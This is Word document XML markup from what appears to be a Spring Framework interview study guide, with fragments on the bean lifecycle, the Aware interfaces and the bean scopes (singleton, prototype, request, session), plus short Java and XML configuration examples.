          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46EE8A49" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E06F5AC" w14:textId="77777777" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D0B856" w14:textId="6CF6D345"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Diagram:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C3E07" w14:textId="2EC7F6AA" w:rsidR="00965ED4" w:rsidRPr="00CE4B95" w:rsidRDefault="00965ED4" w:rsidP="00965ED4">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71" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="241DAB5D"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Interfaces in Bean Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143C76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NameAware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4046AD1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FactoryAware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110EFCE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Aware</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDCE972"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Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877B5E0"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posableBean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E97C0F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destroy() method, called when the bean is being destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED39F1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PostProcessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378B5F38"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B285B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E328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72" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDE832F"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C5B6BF5"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XML-based Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A494D3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3824BBFB"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ava-based Configuration (with annotations):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C6D2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303D991"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE6146" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A68CD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776598C"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6255F4DF"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ization logic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A004E0"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E7D481" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD0052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2A6243B2"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16CBC2A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eanup logic");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F85DD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349F4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D02E88"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of Aware Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695DDE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E6F30E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implements BeanNameAware, ApplicationContextAware {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB4C28C" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1398558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6158EE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BeanName(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1419227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 name is: " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C1F8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63226A" w14:textId="77777777" w:rsidR="00DF4047" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF4047" w:rsidP="00DF4047">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082C0D3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D0375C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pplicationContext is: " + context);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757BFA9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49B957"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581EE4"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73" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA5D3F7"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C17AF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CE4B95"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74" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="701EAD0A" w14:textId="1A13DA5A" w:rsidR="009F301D" w:rsidRPr="00CE4B95" w:rsidRDefault="009F301D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="443" w:name="_Toc197867657"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the spring bean scopes?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w14:paraId="08749739" w14:textId="338B93DE" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="002D1D6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ean scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring defines </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how long a bean liv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ow many instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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75" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6A6AD" w14:textId="77777777" w:rsidR="003D2495" w:rsidRPr="00CE4B95" w:rsidRDefault="003D2495" w:rsidP="00EE58F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B101A35" w14:textId="1C3F1288"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CE4B95" w14:paraId="24AFC488" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33CA4DE1"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re Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="1C6F560B" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="061359E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ide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="023B4B70" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7644B60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new bean instance is created </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>every time</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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stateful objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="11A2287A" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37C9B9F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ingle bean per </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HTTP request</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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EE5EB5C" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14F7888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02178F3E" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7582FC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379B202" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CDF002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is tied to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">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 apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EAEBC69"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2076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EDF23"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Usage in Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275133F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142BB87"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28212A7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67245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E938C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ew Instance Created!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34330B3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CCCC8" w14:textId="494517F0"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130F8F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define scope in XML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23125442" w14:textId="6141D37D"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596D899B"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77" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A44F159"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CE4B95" w14:paraId="2A979CFC" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21EBCEB5"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="269C2D64" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156E2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request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="354068C0" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50862CB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manage post-creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w14:paraId="2C476DAE" w14:textId="77777777" w:rsidTr="00EE58F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02FF5AB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 non-shared objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B4766CE"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78" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3FC854"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eb-Specific Scopes (Request, Session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F4E9A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available in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Web Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, used like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EE528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2DFD1BE"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Application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OPE_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4F7E265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09F0F"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ne instance per HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20094DC7" w14:textId="45CF091E"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1615A"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79" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="321078B6"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3CF3AEBE"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default):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> One bean instance per container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B837395"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New instance each time it's injected/requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF5FCB0"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Session, etc.:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Useful in web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EBB298"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Scope annotation to define the scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342F5613"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80" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7912ABDB" w14:textId="77777777" w:rsidR="00EE58F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE58F0" w:rsidP="00EE58F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BE36A5" w14:textId="2D759821" w:rsidR="009F301D" w:rsidRPr="00CE4B95" w:rsidRDefault="00E34E21">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="444" w:name="_Toc197867658"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain any scope of spring bean</w:t>
      </w:r>
      <w:r w:rsidR="009F301D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="444"/>
    </w:p>
    <w:p w14:paraId="3BFD6C94" w14:textId="248DDA06" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95"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Singleton Bean Scope?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043B2B42"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xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF72D02" w14:textId="6A93646A"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i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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81" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A95BA" w14:textId="77777777" w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA6B51" w:rsidP="00FA6B51">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0505D3BB" w14:textId="4CCEF934"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CE4B95" w14:paraId="1EB9A030" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B987251"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FA6B51" w:rsidRPr="00CE4B95" w14:paraId="0810C8DB" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524306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tc>
      </w:tr>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="72B9F207" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06F6277E"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ne per Spring container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="0FEAAB01" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6286F5C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bean instance is shared across the entire application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="22F1C491" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38AF06A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you must handle synchronization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA6B51" w:rsidRPr="00CE4B95" w14:paraId="18B84ED6" w14:textId="77777777" w:rsidTr="00FA6B51">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="300EB5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ontainer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71B521A9"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82" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD939E5"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de Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D30013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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Compon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singleton") is optional, as it's default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AB64EF"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C0961"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09EF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Bean Created"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE28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EDEB40" w14:textId="1B78485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541835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used in a config file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A908C" w14:textId="2D61706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singleton"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640755F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83" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A65D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en to Use Singleton Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA0980E"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bean is stateless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF6337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reuse resources (like DAOs, services, utility classes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4921490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object creation overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB617E"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84" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
